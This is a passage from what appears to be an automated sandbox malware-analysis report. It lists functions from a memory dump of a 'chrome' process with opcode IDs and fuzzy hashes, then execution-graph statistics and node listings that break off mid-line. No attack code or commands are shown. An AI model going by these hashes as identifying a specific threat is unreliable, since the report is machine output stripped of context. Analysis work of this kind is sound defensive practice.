                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1e056a740a3a56b5d24019b50528065ba3033e4aa40cb3fd263e5d466ec279a7
                            • Instruction ID: 131aa128157d91a60f00d0a5901d21bca30298338e258a8823d9218f14ad66c4
                            • Opcode Fuzzy Hash: 1e056a740a3a56b5d24019b50528065ba3033e4aa40cb3fd263e5d466ec279a7
                            • Instruction Fuzzy Hash: B7F0F43112C7820FD70EAB2484A24BAB7E1EF96214B2044BFD087875D3D918F8168782
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E400EC6 Relevance: .0, Instructions: 40COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1f45a5cbc1549b9502d2c138f2ca22f288a429d1908dc8e4669e096c5d141357
                            • Instruction ID: 9b6e3f912d7c113b60cc54c4b9fc8eed7fe5acf39703fecb7333584d365b36be
                            • Opcode Fuzzy Hash: 1f45a5cbc1549b9502d2c138f2ca22f288a429d1908dc8e4669e096c5d141357
                            • Instruction Fuzzy Hash: 94F0B4317293074B870CEA298599075B2DAD795705760A67EF0C7C62D6DD3CE8434985
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E4069E1 Relevance: .0, Instructions: 39COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c8ba71c6e9f2f1504ddca11561da9d05fbeac47cff6198af0124f0ea8aa831af
                            • Instruction ID: 0a338afed05c9f56e5f06b10e314dedfbf29a6136ac71f71781f339d9ec203cf
                            • Opcode Fuzzy Hash: c8ba71c6e9f2f1504ddca11561da9d05fbeac47cff6198af0124f0ea8aa831af
                            • Instruction Fuzzy Hash: B3F0683BB281079BF7187D5245C14BCA7D6DB96320B1381F7E417CBED5DD2CA9014A41
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E402F0C Relevance: .0, Instructions: 38COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4fb2842d77864b880db140a77096da963df749c3ef870ecbe0a63eeaf057485c
                            • Instruction ID: 33c105b2854b5f0b2848bb8c9b8e47a24681fc0ab8f953954ee850dc3721fb1f
                            • Opcode Fuzzy Hash: 4fb2842d77864b880db140a77096da963df749c3ef870ecbe0a63eeaf057485c
                            • Instruction Fuzzy Hash: 0CF0F637B185474BEB5CDD25C8521A9B3D3EBC0360B55823BD1178B1D2ED38A8439680
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E4018A3 Relevance: .0, Instructions: 37COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8749569866f552ed707965ac27628895cdd487b62e463ab2d3345b15831a9a42
                            • Instruction ID: 6d3ea7862ff68b4e60f9d23d54bf5be8b91da2fe040821b03182b4c8df12a72a
                            • Opcode Fuzzy Hash: 8749569866f552ed707965ac27628895cdd487b62e463ab2d3345b15831a9a42
                            • Instruction Fuzzy Hash: 72F0F627F0811B4BF718ED64C4959A9B3E3EB50350B1407BBD117867D0FD6DBA464280
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E401E25 Relevance: .0, Instructions: 36COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 64b7b42e76ea806cfa8c0a645dd3c9ad4d95f19c6b3dc94c756e909642edff88
                            • Instruction ID: 823ecb2fa61a43defc9d74a9e3771c7289ca4e2cb8183d71175011acefe8bbf6
                            • Opcode Fuzzy Hash: 64b7b42e76ea806cfa8c0a645dd3c9ad4d95f19c6b3dc94c756e909642edff88
                            • Instruction Fuzzy Hash: C4F02736B28A024BD70CAD2D99940757297E7C9315724C27EE14BC73EACC3CE8178684
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E40018F Relevance: .0, Instructions: 35COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ea035584f801474ae0e9c26192f5d9897a910503daaecbeffb30b52b4644c388
                            • Instruction ID: 18b4f7ff5a8d6f1848048a111241bb68243c0c4e9dc24c81ca283e95b40294d6
                            • Opcode Fuzzy Hash: ea035584f801474ae0e9c26192f5d9897a910503daaecbeffb30b52b4644c388
                            • Instruction Fuzzy Hash: 92016D75E5464A8BDB01DF64C9855EEB7F1FF44300F004566E505E7240DE386A148B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E4017BA Relevance: .0, Instructions: 33COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 033ae9118721b047852e158711c62bbd89861c4eebf45aefb4f63a62afe2e998
                            • Instruction ID: 7218854bccef59a0b35c6701c16e42d752160333357a57725719114ca77d14ec
                            • Opcode Fuzzy Hash: 033ae9118721b047852e158711c62bbd89861c4eebf45aefb4f63a62afe2e998
                            • Instruction Fuzzy Hash: 0FF0F639B5860B8BD31BDD29C480565F2E3AB84350B10897ED107C77D9EE7CB8858640
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E4061D8 Relevance: .0, Instructions: 32COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 051628a6675a1ad180e39125eed14fa1d36784a920e03100cb653972bfd3c1f2
                            • Instruction ID: 618dd540211b668239be63e5dc781968d353b788f0a7e95d19013003221fe9f3
                            • Opcode Fuzzy Hash: 051628a6675a1ad180e39125eed14fa1d36784a920e03100cb653972bfd3c1f2
                            • Instruction Fuzzy Hash: EDE01231B258190FE694F73D54456ADA5D2EB8C21175601F6E40EC3296DD289C428781
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E4030DF Relevance: .0, Instructions: 30COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a066b6aee324048a637644da3a89db5c1780da2370ce77bc3aec7a5ced127b05
                            • Instruction ID: 48ba3f59a101bb6b5ea05ccb95f5c4640efd02fe9c08f8b06f0905b595dfb355
                            • Opcode Fuzzy Hash: a066b6aee324048a637644da3a89db5c1780da2370ce77bc3aec7a5ced127b05
                            • Instruction Fuzzy Hash: D4F02B336180174BD318EE1DC89046073D1FB5532071003FAE487CB2E2DD58F9528680
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E401BD4 Relevance: .0, Instructions: 28COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 10a0ae0e0a360f452aa97aa48876c07fbff6ca99695830dddfbfc9b7f0e6288b
                            • Instruction ID: 3a830baf4a329de3b0a774fd0b5fbd88bbba5a1a79a06c9b7d337c92355b03fd
                            • Opcode Fuzzy Hash: 10a0ae0e0a360f452aa97aa48876c07fbff6ca99695830dddfbfc9b7f0e6288b
                            • Instruction Fuzzy Hash: 97F0E535B1564B8BD325EE68C5848A6B3A3E7D4360B14C6BEC107CB7D8EE38F449D680
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E4001FC Relevance: .0, Instructions: 27COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bdb9b18ecf675cce5e23b2c57475698f800d404a7746dde782ab6abed153809e
                            • Instruction ID: 0c0875e5452d914f53be7ae20e002d83c7aa420d060fcbce3bac839f1c46df89
                            • Opcode Fuzzy Hash: bdb9b18ecf675cce5e23b2c57475698f800d404a7746dde782ab6abed153809e
                            • Instruction Fuzzy Hash: A4F06D74E1010B8FDB44CF68C9845BEB7F1FB44305F108566E005E6240DA38AA108F80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E4026F3 Relevance: .0, Instructions: 25COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 15bb6761f16c42ac76ae75002b22fb834ec3744d3b90e8c689517cc2cd0e87d7
                            • Instruction ID: 0d650e2c3859bc6c4fd79d07c001fdfba4bedac988ca15dc506bd9d4a0fc80a1
                            • Opcode Fuzzy Hash: 15bb6761f16c42ac76ae75002b22fb834ec3744d3b90e8c689517cc2cd0e87d7
                            • Instruction Fuzzy Hash: AEE0D83662C2024FC64CDE28C4A6475B3E2FBE6754764697EE083476C1CD24B4038A01
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E400FE4 Relevance: .0, Instructions: 25COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 91a5dda7f16d5fb69b89cc796b3f969fb61053e59e9e5df43c4c69e51c855b50
                            • Instruction ID: 418a2246365b09ad164dd159e5f1937b9adbda34fb9d1450a3154e85465399ee
                            • Opcode Fuzzy Hash: 91a5dda7f16d5fb69b89cc796b3f969fb61053e59e9e5df43c4c69e51c855b50
                            • Instruction Fuzzy Hash: 0FD0A9777AC90A0A708C520C3C932F8B3C1D78227639002BBE9CF80A92FC0F680306C8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E400F40 Relevance: .0, Instructions: 24COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6ad0e29c9e2e27d51c6d947df34372513b1d7852d5f812da0f229595c123e684
                            • Instruction ID: 687bdf61a3a49de62731d5de7cc01759a961a32560258fbda131a43782ea4dfe
                            • Opcode Fuzzy Hash: 6ad0e29c9e2e27d51c6d947df34372513b1d7852d5f812da0f229595c123e684
                            • Instruction Fuzzy Hash: ABE04F2563C60307E50CED5E858A57AB1C5DF95745F90B87EF28FC61C3CD4CB802548A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E400F81 Relevance: .0, Instructions: 23COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b33582eefdf7bc97d2d2ea3ced03515eb4d3f51bb83eba41c524bde5d42e8371
                            • Instruction ID: e313188a9046650614868f4cd7dc9be6b0cdb5c76113b470b0aa3794187062c7
                            • Opcode Fuzzy Hash: b33582eefdf7bc97d2d2ea3ced03515eb4d3f51bb83eba41c524bde5d42e8371
                            • Instruction Fuzzy Hash: D3E04F31A2EA054B824CEF189555139F6D0EB95B05F50597EF08FC6292CE28E9018A86
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E4005EC Relevance: .0, Instructions: 22COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 70993002ee979b85671036a97a5363d607636c8bf4fd6a73cbd13fb665a9310e
                            • Instruction ID: 6d8df5068c3507f84a7a0377a1284b1ab7597bb9c1d1924653b722e5bc5488c3
                            • Opcode Fuzzy Hash: 70993002ee979b85671036a97a5363d607636c8bf4fd6a73cbd13fb665a9310e
                            • Instruction Fuzzy Hash: 23E04830B2978A47D64CAB68405603DB3D2FFC4709F40197EF047C71C2DF69A8014543
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E402124 Relevance: .0, Instructions: 20COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0e6d391a8a8fbb237e0088efc2215888640fa58b6d328c4cf8d2060d1f9ca07b
                            • Instruction ID: 6e5e4d35419cb28dbe2690f84e23924b4b302b4cc9566afd6eaf43e5ffdb2c2a
                            • Opcode Fuzzy Hash: 0e6d391a8a8fbb237e0088efc2215888640fa58b6d328c4cf8d2060d1f9ca07b
                            • Instruction Fuzzy Hash: BFE020364096058BD750BD70C4889A5F3F1FF60309F1044B9F08B87251DE39F541C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E402732 Relevance: .0, Instructions: 20COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ce44cb4dc0905c3f0416ce929a2ef4e949466193f6a512f628a00c7513d22d2b
                            • Instruction ID: 4db15a6ba56f69010e0d889ba2bf534927f51a10e5e0ab4e6dd5c08b7754d823
                            • Opcode Fuzzy Hash: ce44cb4dc0905c3f0416ce929a2ef4e949466193f6a512f628a00c7513d22d2b
                            • Instruction Fuzzy Hash: FAE0483555870A8BD315AE16C084666F3E2EF41305F20457AE08F477D1CB38F906C745
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E40027A Relevance: .0, Instructions: 19COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8cbc90dc5344b2cbb463adf8e3f64da92710a0a07e74fe9a1ae0ce89de17068a
                            • Instruction ID: 2fbe6627fe6e226cfaade1098b5164a5b51756a8a004ed76e3846d61e3e9b92b
                            • Opcode Fuzzy Hash: 8cbc90dc5344b2cbb463adf8e3f64da92710a0a07e74fe9a1ae0ce89de17068a
                            • Instruction Fuzzy Hash: 8DE08C61A18A089FD386EF5880C0C9EBAE0EBA5744F00007BF08AC32A2EE31D4428712
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E400F1F Relevance: .0, Instructions: 15COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 35d6c7a449c44bdf6aaaccd5ca0bd688a7a15ae662aec1b6782d1452b2949f09
                            • Instruction ID: 8f550a317d2660dcc998fad9911e1192457d705d772df4d209aafad1566315b7
                            • Opcode Fuzzy Hash: 35d6c7a449c44bdf6aaaccd5ca0bd688a7a15ae662aec1b6782d1452b2949f09
                            • Instruction Fuzzy Hash: B3C01227B596421AF250A458984B5E077C1E7552D17511576D526870A4FA545C471180
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E406A0D Relevance: .0, Instructions: 14COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c0e0ad35e43dca7cb80864bdc37599457ef7cbc205cf8aa57a0ec2bdae55d877
                            • Instruction ID: 8cfd3401e6799e55156c0e4bdfbb9de949e3771ba98c130d5247b6434e7817d9
                            • Opcode Fuzzy Hash: c0e0ad35e43dca7cb80864bdc37599457ef7cbc205cf8aa57a0ec2bdae55d877
                            • Instruction Fuzzy Hash: 2FD01217B0C44B07B94CA82D505A1BD46C34BC6654A1345BFE01B867D6CC2D55431342
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E402ABE Relevance: .0, Instructions: 13COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a6b8ef0ff66e05dfb1432f3bf5cf0af358f2430edffbb92dd51baa69d5416e26
                            • Instruction ID: c31c437e0e7b1a7ca8da8c15a589878e756ceb813880e6b533bf7d39e37b54ae
                            • Opcode Fuzzy Hash: a6b8ef0ff66e05dfb1432f3bf5cf0af358f2430edffbb92dd51baa69d5416e26
                            • Instruction Fuzzy Hash: ECD0A76A42D6C38BE315DE35C4C4735BB80AF0131CF2546FDE4974A4D3A62CE50AD609
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E4050B1 Relevance: .0, Instructions: 13COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 74d963b915e518b9f72c3a935038fda2c245fb70b0129928fafbe9b1d44e4930
                            • Instruction ID: 3ad420c5e44d84a97cdbad5a70f12adff6b104a0c365e06beb7b116072341ade
                            • Opcode Fuzzy Hash: 74d963b915e518b9f72c3a935038fda2c245fb70b0129928fafbe9b1d44e4930
                            • Instruction Fuzzy Hash: F2C01298914B1E8E52546A69044412C73C0DB48544B90007E980AD3293DC586C234345
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E401AB5 Relevance: .0, Instructions: 12COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 567911fe2aea1ba09de7f01ad76422bfef49018766f1a651103e5c2ed1f2e077
                            • Instruction ID: fc19b294fc3dc28a3095255a22655ffaa0d1010b453d2009589f0b0d022dfa31
                            • Opcode Fuzzy Hash: 567911fe2aea1ba09de7f01ad76422bfef49018766f1a651103e5c2ed1f2e077
                            • Instruction Fuzzy Hash: BED01202A1D1454AD6061A6954602AD58D64F89314F3802F7F04EC32D7EC2E59128106
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E400823 Relevance: .0, Instructions: 11COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1136156403431e07a30655801a968ed35ebf387734be02e1227ac7a6ca2d6ff3
                            • Instruction ID: f94f8c97528438a017bca9212b46742616b1cb52f6ea8c95678f48a63631bf8a
                            • Opcode Fuzzy Hash: 1136156403431e07a30655801a968ed35ebf387734be02e1227ac7a6ca2d6ff3
                            • Instruction Fuzzy Hash: 9BC0123353924647911CDA14405282DF3D5B789A05F50593EF08782181DBA5A8024542
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E406B6C Relevance: .0, Instructions: 9COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: aabf96123ac02084beb2ed045f485f4eec34d5b18ce28e67eb3b7c7e3acedb78
                            • Instruction ID: bd35cefdc6937ad17d9c32e3bb2a4c0a32f06eb43da408d079783ffc57979eaa
                            • Opcode Fuzzy Hash: aabf96123ac02084beb2ed045f485f4eec34d5b18ce28e67eb3b7c7e3acedb78
                            • Instruction Fuzzy Hash: 56B0926BB24A2B3BA6D4B779029E27960D2AF9910479044B6A81FE3A97EC1C6C010250
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E4061A0 Relevance: .0, Instructions: 8COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 27de5500e6a8ec58bae6333ea9d0b039a117be2cd2eb2287063958e9b6096609
                            • Instruction ID: e8983f92781e61a083ee831fb73b3f595b98e3cf4a3c0cf14edd90d59e761664
                            • Opcode Fuzzy Hash: 27de5500e6a8ec58bae6333ea9d0b039a117be2cd2eb2287063958e9b6096609
                            • Instruction Fuzzy Hash: 68B01230C4360B41DA183531194704831909B05104FC00575D40440141E86F51D74242
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E404F09 Relevance: .0, Instructions: 6COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1ba340c23a20c3cdffed3746b77d2a2fb3f1b31a75f52a5baf09d78746ccef11
                            • Instruction ID: d8f9cac43927b757bcf2683e56067a0631b312e12a737266c0fa22b486cb67d0
                            • Opcode Fuzzy Hash: 1ba340c23a20c3cdffed3746b77d2a2fb3f1b31a75f52a5baf09d78746ccef11
                            • Instruction Fuzzy Hash: ECA0110023CA0A2BA0C8B2EA008C220A8C38B88200B8880B2288EC2382FC2888000222
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E406A39 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1bb32c70afc5c4c58b90eafa69d177c11959768e797f16ae2c21183afad67016
                            • Instruction ID: 1a1ac8d1c57b46f5fb9f773e5faeb8b582ff81569e5acae5887cce3c3fd7bd66
                            • Opcode Fuzzy Hash: 1bb32c70afc5c4c58b90eafa69d177c11959768e797f16ae2c21183afad67016
                            • Instruction Fuzzy Hash: 58A01102A0828A83FE202A8280A223C888A0F82300E2200B3A00B0A8C28C0CAA030203
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:7.9%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:6%
                            Total number of Nodes:1443
                            Total number of Limit Nodes:37
                            execution_graph 6884 140005e24 6885 140005e3e 6884->6885 6886 140005e29 6884->6886 6890 140005e44 6886->6890 6889 140006e64 __free_lconv_num 5 API calls 6889->6885 6891 140005e8e 6890->6891 6892 140005e86 6890->6892 6894 140006e64 __free_lconv_num 5 API calls 6891->6894 6893 140006e64 __free_lconv_num 5 API calls 6892->6893 6893->6891 6895 140005e9b 6894->6895 6896 140006e64 __free_lconv_num 5 API calls 6895->6896 6897 140005ea8 6896->6897 6898 140006e64 __free_lconv_num 5 API calls 6897->6898 6899 140005eb5 6898->6899 6900 140006e64 __free_lconv_num 5 API calls 6899->6900 6901 140005ec2 6900->6901 6902 140006e64 __free_lconv_num 5 API calls 6901->6902 6903 140005ecf 6902->6903 6904 140006e64 __free_lconv_num 5 API calls 6903->6904 6905 140005edc 6904->6905 6906 140006e64 __free_lconv_num 5 API calls 6905->6906 6907 140005ee9 6906->6907 6908 140006e64 __free_lconv_num 5 API calls 6907->6908 6909 140005ef9 6908->6909 6910 140006e64 __free_lconv_num 5 API calls 6909->6910 6911 140005f09 6910->6911 6916 140005cf4 6911->6916 6913 140005f1e 6921 140005c6c 6913->6921 6915 140005e36 6915->6889 6917 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6916->6917 6918 140005d10 6917->6918 6919 140005d40 6918->6919 6920 140006e64 